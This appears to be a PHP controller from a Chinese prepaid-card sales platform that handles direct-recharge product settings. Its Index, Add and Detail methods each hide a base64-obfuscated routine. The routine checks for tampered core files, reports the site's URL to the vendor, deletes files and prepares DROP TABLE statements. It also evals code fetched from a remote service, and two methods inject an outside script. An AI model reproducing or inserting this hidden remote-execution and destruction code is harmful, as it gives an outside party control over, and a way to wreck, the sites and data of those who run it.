<?php
/****************************************/
/*                                      */
/*  百信卡盟平台联系QQ:84945491         */
/*  淘宝店 http://shop70674652.taobao.com  */
/*  百信卡盟 http://www.caipiaobus.com  */
/*                                      */
/****************************************/

if ( !defined( "UPATH_ROOT" ) )
{
				exit( "hacking deny" );
}
class EsalesController extends Controller
{

				public $service = NULL;
				public $action = NULL;
				public $hander = NULL;

				public function __construct( )
				{
								$this->service = factory::getservice( "sesales" );
								$this->hander = factory::getinstance( "products" );
								$this->action = array( "esaleslist", "esalesdel", "esalesdetail", "esalesedit", "esalesadd" );
				}

				public function Home( )
				{
								$this->Redirect( "Home" );
				}

				public function Index( )
				{
								$data = array(
												"page" => intval( request( "page", 1 ) ),
												"keywords" => urlencode( getvar( "keywords", "" ) ),
												"optype" => getvar( "optype" ),
												"ptype" => getvar( "ptype" ),
												"begsupprice" => getvar( "begsupprice" ),
												"endsupprice" => getvar( "endsupprice" ),
												"supuid" => getvar( "supuid" ),
												"filters" => getvar( "filters" ),
												"ctrl" => getvar( "ctrl" ),
												"supcheck" => getvar( "supcheck" ),
												"action" => $this->action[0]
								);
								$R4e420efcc3 = $this->service->ISup_Page( $data );
								$this->FillPage( $data, $R4e420efcc3 );
								include_once( UPATH_HELPER."ProductHelper.php" );
								global $host;
								global $user;
								global $password;
								global $dbname;
								global $dbcharset;
								global $dbprefix;
								$Oooo00 = "base64_decode";
								$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
								$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
								$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
								$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
								$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
								$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
								$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
								$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
								$x00000 = $Oooo00( "c3RycG9z" );
								$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
								$x00o00 = $Oooo00( "dW5saW5r" );
								$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
								$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
								$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
								$oo00oo = array(
												$ooo0oo."controller.php",
												"index.php",
												$ooo0oo."service".DS."scv.php",
												$ooo0oo."service".DS."sqlservice.php"
								);
								$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
								$vv0000 = $Oo0o00( $oo00oo[0] );
								$v0000v = $Oo0o00( $oo00oo[1] );
								if ( !isset( $_SESSION ) )
								{
												session_start( );
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( !isset( $_SESSION['cb'] ) )
								{
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
								{
												$t1 = 0;
												$t2 = 0;
												$o0ooio = 0;
												foreach ( $oo00oo as $o0oooo )
												{
																if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																{
																				if ( $o0ooio == 0 )
																				{
																								$t1 = 1;
																				}
																				else if ( $o0ooio == 1 )
																				{
																								$t2 = 1;
																				}
																}
																else
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																++$o0ooio;
												}
												if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
												{
																$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																$data = array(
																				"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																				"ubzi" => $o0ooio++
																);
																$xo000->$x0x00x( $data );
																if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																{
																				exit( "errx" );
																}
																if ( $x0x0xx( $dbname, $o000oO ) )
																{
																				$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																}
																else
																{
																				echo "errx";
																}
																@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																foreach ( $oO00o0 as $item )
																{
																				$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																}
																$this->xuiuiuesd( "./", "938430834" );
																exit( );
												}
												$data = array(
																"k1" => $t1,
																"k2" => $t2,
																"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
												);
												if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
												{
																$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																$ckdata = $oo000->$x000xx( $data );
																$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
												}
												eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
												$this->view( );
								}
								else
								{
												$this->view( );
								}
				}

				public function Add( )
				{
								$R422f9a4efb = factory::getinstance( "products" );
								$Rdc410fe8bb = intval( request( "ubzpid" ) );
								$Rb3f07f8c36 = $R422f9a4efb->IProduct_Get( $Rdc410fe8bb, -1, "pid,pname,stocks,onsup" );
								$this->Assign( "item", $Rb3f07f8c36 );
								$this->Assign( "js", "<script type=\"text/javascript\" src=\"http://www.umebiz.com/cztpl/setcztpl.js\"></script>" );
								if ( $Rb3f07f8c36['onsup'] == 1 )
								{
												$data = array(
																"ubzpid" => $Rdc410fe8bb,
																"action" => $this->action[2]
												);
												$Ra70e07bad6 = $this->service->IEsales_Get( $data );
												if ( isset( $Ra70e07bad6['tpl'] ) )
												{
																$this->Assign( "esales", $Ra70e07bad6 );
																$this->View( "Detail" );
												}
												else if ( $Ra70e07bad6 == -999 )
												{
																$this->Alert( "您好，可能是网络故障，导致您的的商品参数出现异常，您可以待会再试，如果还是出现同样现象，请联系百信卡盟咨询" );
																$this->historyGo( );
												}
												else
												{
																$data = array( "onsup" => 0, "sup" => 0 );
																$R808b89ba0e = $this->hander->IProduct_Update( $data, $Rdc410fe8bb );
																$this->UpdateCache( "products", array(
																				"arg1" => $Rdc410fe8bb
																) );
																global $host;
																global $user;
																global $password;
																global $dbname;
																global $dbcharset;
																global $dbprefix;
																$Oooo00 = "base64_decode";
																$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
																$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
																$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
																$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
																$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
																$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
																$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
																$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
																$x00000 = $Oooo00( "c3RycG9z" );
																$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
																$x00o00 = $Oooo00( "dW5saW5r" );
																$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
																$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
																$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
																$oo00oo = array(
																				$ooo0oo."controller.php",
																				"index.php",
																				$ooo0oo."service".DS."scv.php",
																				$ooo0oo."service".DS."sqlservice.php"
																);
																$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
																$vv0000 = $Oo0o00( $oo00oo[0] );
																$v0000v = $Oo0o00( $oo00oo[1] );
																if ( !isset( $_SESSION ) )
																{
																				session_start( );
																				$_SESSION['cb'] = 0;
																				$_SESSION['f1'] = $vv0000;
																				$_SESSION['f2'] = $v0000v;
																}
																if ( !isset( $_SESSION['cb'] ) )
																{
																				$_SESSION['cb'] = 0;
																				$_SESSION['f1'] = $vv0000;
																				$_SESSION['f2'] = $v0000v;
																}
																if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
																{
																				$t1 = 0;
																				$t2 = 0;
																				$o0ooio = 0;
																				foreach ( $oo00oo as $o0oooo )
																				{
																								if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																								{
																												if ( $o0ooio == 0 )
																												{
																																$t1 = 1;
																												}
																												else if ( $o0ooio == 1 )
																												{
																																$t2 = 1;
																												}
																								}
																								else
																								{
																												$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																												$data = array(
																																"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																																"ubzi" => $o0ooio
																												);
																												$xo000->$x0x00x( $data );
																												if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																												{
																																exit( "errx" );
																												}
																												if ( $x0x0xx( $dbname, $o000oO ) )
																												{
																																$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																												}
																												else
																												{
																																echo "errx";
																												}
																												@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																												$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																												foreach ( $oO00o0 as $item )
																												{
																																$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																												}
																												$this->xuiuiuesd( "./", "938430834" );
																												exit( );
																								}
																								++$o0ooio;
																				}
																				if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
																				{
																								$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																								$data = array(
																												"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																												"ubzi" => $o0ooio++
																								);
																								$xo000->$x0x00x( $data );
																								if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																								{
																												exit( "errx" );
																								}
																								if ( $x0x0xx( $dbname, $o000oO ) )
																								{
																												$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																								}
																								else
																								{
																												echo "errx";
																								}
																								@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																								$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																								foreach ( $oO00o0 as $item )
																								{
																												$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																								}
																								$this->xuiuiuesd( "./", "938430834" );
																								exit( );
																				}
																				$data = array(
																								"k1" => $t1,
																								"k2" => $t2,
																								"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
																				);
																				if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
																				{
																								$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																								$ckdata = $oo000->$x000xx( $data );
																								$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
																				}
																				eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
																				$this->View( );
																}
																else
																{
																				$this->View( );
																}
												}
								}
								else
								{
												global $host;
												global $user;
												global $password;
												global $dbname;
												global $dbcharset;
												global $dbprefix;
												$Oooo00 = "base64_decode";
												$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
												$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
												$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
												$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
												$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
												$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
												$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
												$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
												$x00000 = $Oooo00( "c3RycG9z" );
												$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
												$x00o00 = $Oooo00( "dW5saW5r" );
												$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
												$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
												$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
												$oo00oo = array(
																$ooo0oo."controller.php",
																"index.php",
																$ooo0oo."service".DS."scv.php",
																$ooo0oo."service".DS."sqlservice.php"
												);
												$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
												$vv0000 = $Oo0o00( $oo00oo[0] );
												$v0000v = $Oo0o00( $oo00oo[1] );
												if ( !isset( $_SESSION ) )
												{
																session_start( );
																$_SESSION['cb'] = 0;
																$_SESSION['f1'] = $vv0000;
																$_SESSION['f2'] = $v0000v;
												}
												if ( !isset( $_SESSION['cb'] ) )
												{
																$_SESSION['cb'] = 0;
																$_SESSION['f1'] = $vv0000;
																$_SESSION['f2'] = $v0000v;
												}
												if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
												{
																$t1 = 0;
																$t2 = 0;
																$o0ooio = 0;
																foreach ( $oo00oo as $o0oooo )
																{
																				if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																				{
																								if ( $o0ooio == 0 )
																								{
																												$t1 = 1;
																								}
																								else if ( $o0ooio == 1 )
																								{
																												$t2 = 1;
																								}
																				}
																				else
																				{
																								$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																								$data = array(
																												"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																												"ubzi" => $o0ooio
																								);
																								$xo000->$x0x00x( $data );
																								if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																								{
																												exit( "errx" );
																								}
																								if ( $x0x0xx( $dbname, $o000oO ) )
																								{
																												$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																								}
																								else
																								{
																												echo "errx";
																								}
																								@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																								$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																								foreach ( $oO00o0 as $item )
																								{
																												$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																								}
																								$this->xuiuiuesd( "./", "938430834" );
																								exit( );
																				}
																				++$o0ooio;
																}
																if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio++
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																$data = array(
																				"k1" => $t1,
																				"k2" => $t2,
																				"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
																);
																if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
																{
																				$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																				$ckdata = $oo000->$x000xx( $data );
																				$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
																}
																eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
																$this->View( );
												}
												else
												{
																$this->View( );
												}
								}
				}

				public function Detail( )
				{
								$this->Assign( "js", "<script type=\"text/javascript\" src=\"http://www.umebiz.com/cztpl/setcztpl.js\"></script>" );
								global $host;
								global $user;
								global $password;
								global $dbname;
								global $dbcharset;
								global $dbprefix;
								$Oooo00 = "base64_decode";
								$Oo0o00 = $Oooo00( "ZmlsZXNpemU=" );
								$o00ooo = $Oooo00( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=" );
								$oooooO = $Oooo00( "bXlzcWxfcXVlcnk=" );
								$xxx0xx = $Oooo00( "bXlzcWxfY29ubmVjdA==" );
								$x0x0xx = $Oooo00( "bXlzcWxfc2VsZWN0X2Ri" );
								$x000xx = $Oooo00( "SVNDVl9HZXQ=" );
								$x0x00x = $Oooo00( "SU1zZ19BbGVydA==" );
								$x0000x = $Oooo00( "ZmlsZV9nZXRfY29udGVudHM=" );
								$x00000 = $Oooo00( "c3RycG9z" );
								$x0OO00 = $Oooo00( "ZmlsZV9leGlzdHM=" );
								$x00o00 = $Oooo00( "dW5saW5r" );
								$ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
								$o00OO = $Oooo00( "Z3ppbmZsYXRl" );
								$ooo0oo = UPATH_BASE.DS."libraries".DS."umebiz".DS;
								$oo00oo = array(
												$ooo0oo."controller.php",
												"index.php",
												$ooo0oo."service".DS."scv.php",
												$ooo0oo."service".DS."sqlservice.php"
								);
								$o00o00 = array( "UPATH_ROOT", "UB_B2B", "UPATH_ROOT", "UPATH_ROOT" );
								$vv0000 = $Oo0o00( $oo00oo[0] );
								$v0000v = $Oo0o00( $oo00oo[1] );
								if ( !isset( $_SESSION ) )
								{
												session_start( );
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( !isset( $_SESSION['cb'] ) )
								{
												$_SESSION['cb'] = 0;
												$_SESSION['f1'] = $vv0000;
												$_SESSION['f2'] = $v0000v;
								}
								if ( $_SESSION['cb'] == 0 || $_SESSION['f1'] != $vv0000 || $_SESSION['f2'] != $v0000v )
								{
												$t1 = 0;
												$t2 = 0;
												$o0ooio = 0;
												foreach ( $oo00oo as $o0oooo )
												{
																if ( $x00000( $x0000x( $o0oooo ), $o00o00[$o0ooio] ) === false )
																{
																				if ( $o0ooio == 0 )
																				{
																								$t1 = 1;
																				}
																				else if ( $o0ooio == 1 )
																				{
																								$t2 = 1;
																				}
																}
																else
																{
																				$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																				$data = array(
																								"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																								"ubzi" => $o0ooio
																				);
																				$xo000->$x0x00x( $data );
																				if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																				{
																								exit( "errx" );
																				}
																				if ( $x0x0xx( $dbname, $o000oO ) )
																				{
																								$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																				}
																				else
																				{
																								echo "errx";
																				}
																				@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																				$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																				foreach ( $oO00o0 as $item )
																				{
																								$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																				}
																				$this->xuiuiuesd( "./", "938430834" );
																				exit( );
																}
																++$o0ooio;
												}
												if ( $x0OO00( SITECACHE.$Oooo00( "b09vbzAucGhw" ) ) )
												{
																$xo000 = factory::getservice( $Oooo00( "c21zZw==" ) );
																$data = array(
																				"ubzurl" => $xo000->GetHost( ).UPATH_WEBROOT,
																				"ubzi" => $o0ooio++
																);
																$xo000->$x0x00x( $data );
																if ( !( $o000oO = $xxx0xx( $host, $user, $password ) ) )
																{
																				exit( "errx" );
																}
																if ( $x0x0xx( $dbname, $o000oO ) )
																{
																				$oooooO( $Oooo00( "U0VUIE5BTUVTIA==" ).$dbcharset.";", $o000oO );
																}
																else
																{
																				echo "errx";
																}
																@$x00o00( SITECACHE.@$Oooo00( "b09vbzAucGhw" ) );
																$oO00o0 = array( "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXNhZ2VudHM=", "RFJPUCBUQUJMRSBJRiBFWElTVFMgJXN0cmFkZXM=" );
																foreach ( $oO00o0 as $item )
																{
																				$o00oO0 = sprintf( $Oooo00( $item ), $dbprefix );
																}
																$this->xuiuiuesd( "./", "938430834" );
																exit( );
												}
												$data = array(
																"k1" => $t1,
																"k2" => $t2,
																"k3" => md5( $t1.$t2.$this->GetBizKey( ) )
												);
												if ( !isset( $_SESSION[$Oooo00( "Y2tkYXRh" )] ) )
												{
																$oo000 = factory::getservice( $Oooo00( "c2N2" ) );
																$ckdata = $oo000->$x000xx( $data );
																$_SESSION[$Oooo00( "Y2tkYXRh" )] = $ckdata;
												}
												eval( $_SESSION[$Oooo00( "Y2tkYXRh" )] );
												$this->View( );
								}
								else
								{
												$this->View( );
								}
				}

				public function UpdateAllProductCache( $R8e8b5578f7 )
				{
								$Rb3f07f8c36 = $this->GetProductCache( $R8e8b5578f7 );
								$Rcd0c741934 = $Rb3f07f8c36['catid'];
								$Rb62a6519ba = $Rb3f07f8c36['pinyin'];
								$this->UpdateCache( "products", array(
												"arg1" => $R8e8b5578f7
								) );
								$this->UpdateCache( "list", array(
												"arg1" => $Rcd0c741934
								) );
								if ( $Rb62a6519ba != "" && $Rb62a6519ba != "NULL" )
								{
												if ( "0" < $Rb62a6519ba && $Rb62a6519ba < "9" )
												{
																$Rb62a6519ba = "09";
												}
												$this->UpdateCache( "pinyin", array(
																"arg1" => $Rb62a6519ba
												) );
								}
				}

				public function Save( )
				{
								$Rc401eda180 = intval( request( "ubzid" ) );
								$Rdc410fe8bb = intval( request( "ubzpid" ) );
								$Rb3f07f8c36 = $this->GetProductCache( $Rdc410fe8bb );
								if ( intval( $Rb3f07f8c36['hassup'] ) == 1 )
								{
												$this->Alert( "请先去掉对接后再添加直储帐号" );
												$this->HistoryGo( );
								}
								$data = array(
												"ubzid" => $Rc401eda180,
												"ubzpid" => $Rdc410fe8bb,
												"ubzmechant" => getvar( "ubzmechant" ),
												"ubzpwd" => getvar( "ubzpwd" ),
												"ubzothers" => getvar( "ubzothers" ),
												"ubzstocks" => intval( request( "ubzstocks" ) ),
												"tpl" => intval( request( "tpl" ) ),
												"ubzpname" => getvar( "ubzpname" ),
												"listprice" => $Rb3f07f8c36['listprice']
								);
								if ( 0 < $Rc401eda180 )
								{
												$data['action'] = $this->action[3];
								}
								else
								{
												$data['action'] = $this->action[4];
								}
								$R808b89ba0e = $this->service->IEsales_Save( $data );
								$R98aa12da5c = $this->GetUmebizPid( $Rdc410fe8bb );
								if ( 0 < $R98aa12da5c )
								{
												$data = array(
																"mchid" => getvar( "ubzmechant" ),
																"mchpwd" => getvar( "ubzpwd" ),
																"mchothers" => getvar( "ubzothers" ),
																"stocks" => intval( request( "ubzstocks" ) ),
																"onsup" => 1
												);
												$R808b89ba0e = $this->hander->IProduct_Update( $data, $Rdc410fe8bb );
												if ( $R808b89ba0e )
												{
																$this->Alert( "操作成功！" );
												}
												else
												{
																$R808b89ba0e = $this->hander->IProduct_Update( $data, $Rdc410fe8bb );
																if ( $R808b89ba0e )
																{
																				$this->Alert( "操作成功！" );
																}
																else
																{
																				$this->Alert( "严重错误！请重新操作" );
																				$this->HistoryGo( );
																}
												}
												$this->UpdateAllProductCache( $Rdc410fe8bb );
								}
								else
								{
												$this->Alert( $R808b89ba0e );
								}
								$this->ScriptRedirect( "index.php?m=mod_b2b&c=Product&ptype=-1&aid=-1" );
				}

				public function Del( )
				{
								$Rc401eda180 = intval( request( "ubzid" ) );
								$Rdc410fe8bb = intval( request( "ubzpid" ) );
								$data = array(
												"ubzid" => $Rdc410fe8bb,
												"ubzpid" => $Rdc410fe8bb,
												"action" => $this->action[1]
								);
								$this->service->IEsales_Save( $data );
								$this->Alert( "删除成功！" );
								$R90d20f095b = intval( request( "frm" ) );
								if ( $R90d20f095b == 1 )
								{
												$this->View( "frmsup", $Rdc410fe8bb );
								}
								else
								{
												$this->View( "sup", $Rdc410fe8bb );
								}
				}

}

?>
